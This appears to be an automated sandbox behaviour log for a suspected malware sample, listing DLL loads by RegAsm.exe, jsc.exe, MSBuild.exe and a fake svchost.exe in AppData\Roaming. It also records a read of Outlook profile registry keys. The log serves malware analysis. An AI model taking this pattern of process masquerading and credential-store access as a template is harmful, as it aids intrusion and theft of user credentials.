Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: LisectAVT_2403002A_29.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LisectAVT_2403002A_29.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: LisectAVT_2403002A_29.exe

